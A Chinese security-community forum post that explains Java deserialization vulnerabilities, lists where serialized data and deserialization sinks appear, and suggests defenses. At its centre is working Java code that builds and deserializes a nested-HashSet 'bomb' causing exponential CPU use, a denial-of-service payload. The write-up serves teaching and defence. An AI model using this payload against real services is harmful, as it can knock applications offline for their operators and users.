【大白分享】渗透安全之反序列化漏洞-Java-Bong~炸弹
  

山东_朱文鑫 31391人觉得有帮助

{{ttag.title}}
本帖最后由 山东_朱文鑫 于 2023-6-10 22:10 编辑

家好,我是大白,内既坚实,则外界之九千九百九十九种恶口,当亦如秋风一吹,青蝇绝响。依旧感谢各位小伙伴的一路支持与陪伴。

因为之前的渗透安全之Java反序列拒绝服务攻击分享答应过小伙伴们有时间会整理一下反序列化漏洞的相关知识,我也是在HVV常用处理方式的催促中尽快给该部分小伙伴尽快附上反序列化,还是总体来说确实更加偏向于安服但是对于安全知识的了解以及更加层次的学习甚至使用都比较重要,我们可以一同研习一下渗透的“魅力”。


*本篇章将本着学习的态度进行分享,严禁用于个人非法行为以及黑产获取!!!!

序列化是当以的将对象的状态信息转换为可以存储或传输的形式(字符串)的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。





简单的说,序列化就是把一个对象变成可以传输的字符串,可以以特定的格式在进程之间跨平台、安全的进行通信。各种语言都有反序列化漏洞,Java、PHP、Python等。序列化即将对象转化为字节流,便于保存在文件,内存,数据库中;反序列化即将字节流转化为对象,也就是序列化的逆过程。

Java序列化把Java对象转换为字节序列的过程便于保存在文件、内存、数据库中,ObjectOutputStream类的writeObject()方法可以实现序列化。



反序列化是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类的readObject()方法用于反序列化。

按照本质来讲序列化和反序列化本身并不存在问题。主要问题在于,如果Java应用对用户输入不做限制,即对不可信数据做了反序列化处理,那么攻击者就可以通过构造恶意代码,让反序列化产生非预期的对象,非预期对象在产生过程中就有可能带来任意代码执行。

反序列化漏洞需要三个东西:

    1.反序列化入口

    2.目标方法

    3.利用链(gadget chain)

在挖掘反序列化漏洞中基本上都回去寻找重写了readObject方法的类,配合上Java的反射机制,构造利用链,形成了Java中特色的反序列化攻击。

对于Java的反序列化炸弹原理就是利用HashSet 重写了readObject()方法,例如:有67个java对象就大约1915个字节,那么执行的越多字节数会呈指数增长。

我们都知道HashSet 底层使用HashMap实现的:

  1. // Read in all elements in the proper order.
  2. for (int i=0; i<size; i++) {
  3.     @SuppressWarnings("unchecked")
  4.         E e = (E) s.readObject();
  5.     map.put(e, PRESENT);
  6. }
复制代码

所以调用链应为:

  1. public V put(K key, V value) {
  2.     return putVal(hash(key), key, value, false, true);
  3. }

  4. static final int hash(Object key) {
  5.     int h;
  6.     return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
  7. }
复制代码

hash()里的key是HashSet,继承了AbstractSet的hashCode()方法;可以看出计算当前对象的hashCode 需要对其所有元素进行累加,而其元素又是set集合,递归调用,这就是有问题的地方他们会呈满二叉树进行增长。

  1. public int hashCode() {
  2.     int h = 0;
  3.     Iterator<E> i = iterator();
  4.     while (i.hasNext()) {
  5.         E obj = i.next();
  6.         if (obj != null)
  7.             h += obj.hashCode();
  8.     }
  9.     return h;
  10. }
复制代码



例如这段代码,这里面存放两个set引用,并且以sangfor为根节点,每个set再存放两个新的set的引用,以此类推,循环100次,每个节点包含至多3个元素,层次结构大致是一棵树,树的深度为101。共创建201个对象。



  1. public void serializable() throws IOException {
  2.        Set<Object> sangfor = new HashSet<>();
  3.        Set<Object> s1 = sangfor;
  4.        Set<Object> s2 = new HashSet<>();
  5.        for (int i = 0; i < 100; i++) {
  6.            Set<Object> t1 = new HashSet<>();
  7.            Set<Object> t2 = new HashSet<>();
  8.            t1.add("foo"); // Make t1 unequal to t2
  9.            s1.add(t1);  s1.add(t2);
  10.            s2.add(t1);  s2.add(t2);
  11.            s1 = t1;
  12.            s2 = t2;
  13.                 }

  14.         String filePath="/Users/Desktop/ceshi";
  15.         try(ObjectOutputStream objectOutputStream=new ObjectOutputStream(new FileOutputStream(filePath));){
  16.             objectOutputStream.writeObject(sangfor);
  17.         }
  18.     }
复制代码


那么这就是个“炸弹”模型,那么我们如何“引爆”它呢?


  1. public void deserializable() throws IOException, ClassNotFoundException {
  2.         String filePath="/Users/Desktop/ceshi";
  3.     try(ObjectInputStream inputStream=new ObjectInputStream(new FileInputStream(filePath))) {
  4.         Set<Object> set=(Set<Object>) inputStream.readObject();
  5.     }
  6. }
复制代码


就是通过以上执行,执行次数与深度成指数关系,这样以满二叉树的方式循环执行扩大,我们仅仅是100次循环,相信我不到1000次循环就足够大,那么无限趋向于无限次循环呢?那么Bong~!!!


那么如何判断Java序列化:


     数据以 rO0AB 开头,你基本可以确定这串就是 JAVA 序列化 base64 加密的数据;或者如果以 ACED 开头,那么他就是这一段 java 序列化的 16 进制。



     http 参数, cookie , sesion ,存储方式可能是 base64(rO0 ),压缩后的base64(H4s),MII 等 Servlets http,Sockets,Session 管理器,包含的协议就包括: JMX、RMI、JMS、JND1等。(/xac/Xed) xm IXstream/XmldEcoder等(http Body:Content-type: application/xml)json(jackson,fastjson)http请求中包含。

序列化函数接口:



      1、Java:

        Serializable Externalizable 接口、 fastjson 、 jackson 、 gson 、ObjectInputStream.read、 ObjectObjectInputStream.readUnshared 、 XMLDecoder.read、 ObjectYaml.loadXStream.fromXML 、ObjectMapper.readValue、 JSON.parseObject 等。



      2、PHP :

        serialize() 、 unserialize()。



      3、Python:

         pickle。

关于反序列化的防护方式:

     1.常见的隔离防护,网络隔离,沙箱,容器,虚拟机可以创建安全的数据中心,从而阻止攻击者直接获得访问端口的权限。

      2.信息验证和加密,SSL/TLS可以防御从外网发动的“中间人”攻击,因为攻击这没有私钥破解TLS会话。

      3.输入验证,所有从I/O读取的数据都是不可信的(文件可以被窜改,网络输入也可以被改写)。序列化的数据是从I/O读取的,一种保护的方法也许是对输入进行验证。

      4.开发代码安全,可以禁掉RMI以及JMX的端口,或者可以借助JVM agent解决办法(如Tapiki或者HypericSigar), 甚至可以安装Jolokia或者jmxtrans来试图减少攻击面等。

      5.SecurityManager保护,JVM有SecurityManager保护,保护那些自定义的ObjectInputStream子类。

以上就是本次的渗透安全之反序列化漏洞-Java-Bong~炸弹分享,感谢大佬们的参阅,此贴先到这里后续会带上更加优质的帖子,感谢大家!

*本篇章将本着学习的态度进行分享,严禁用于个人非法行为以及黑产获取!!!!

励志分享超清壁纸语句~~:



志士惜年,贤人惜日,圣人惜时。——魏源


好的今天就到这里,老样子,感谢各位大神的参阅,孩子为了挣豆子不容易,孩子家里穷没豆子吃饭了!!!


打赏鼓励作者,期待更多好文!

打赏
2人已打赏

飞翔的苹果 发表于 2024-7-1 08:57
  
学习一下,增加处理经验
新手378833 发表于 2023-11-2 16:52
  
感谢分享,有助于工作和学习
新手626351 发表于 2023-10-29 16:24
  
感谢分享,学习下!!!
新手378833 发表于 2023-10-17 08:57
  
感谢楼主分享,学习一下
新手716814 发表于 2023-10-13 10:56
  

感谢楼主分享,努力学习中!!!!
dhf 发表于 2023-9-1 09:56
  
每日打卡学习,感谢分享,学习了!!!
dhf 发表于 2023-8-28 11:16
  
每日打卡学习,感谢分享,学习了!!!
新手138949 发表于 2023-8-27 10:08
  
楼主分享的案例很实用,具有典型性,希望有更多这样的干货供我们学习参考,非常感谢!
新手626351 发表于 2023-7-22 08:14
  
感谢分享有助于工资和学习!
发表新帖
热门标签
全部标签>
安全效果
西北区每日一问
技术盲盒
技术笔记
干货满满
【 社区to talk】
每日一问
信服课堂视频
GIF动图学习
新版本体验
技术咨询
2023技术争霸赛专题
功能体验
产品连连看
自助服务平台操作指引
标准化排查
秒懂零信任
技术晨报
安装部署配置
原创分享
排障笔记本
玩转零信任
排障那些事
SDP百科
技术争霸赛
深信服技术支持平台
通用技术
以战代练
升级&主动服务
社区新周刊
畅聊IT
答题自测
专家问答
技术圆桌
在线直播
MVP
网络基础知识
升级
安全攻防
上网策略
测试报告
日志审计
问题分析处理
流量管理
每日一记
运维工具
云计算知识
用户认证
解决方案
sangfor周刊
VPN 对接
项目案例
SANGFOR资讯
专家分享
技术顾问
信服故事
功能咨询
终端接入
授权
设备维护
资源访问
地址转换
虚拟机
存储
迁移
加速技术
产品预警公告
信服圈儿
S豆商城资讯
「智能机器人」
追光者计划
社区帮助指南
答题榜单公布
纪元平台
卧龙计划
华北区拉练
天逸直播
山东区技术晨报
文档捉虫活动
齐鲁TV
华北区交付直播
每周精选
2024年技术争霸赛
北京区每日一练
场景专题
故障笔记
高手请过招
高频问题集锦
POC测试案例
全能先锋系列
云化安全能力

本版版主

7
20
6

发帖

粉丝

关注

本版达人

ggbang

本周建议达人

adds

本周提问达人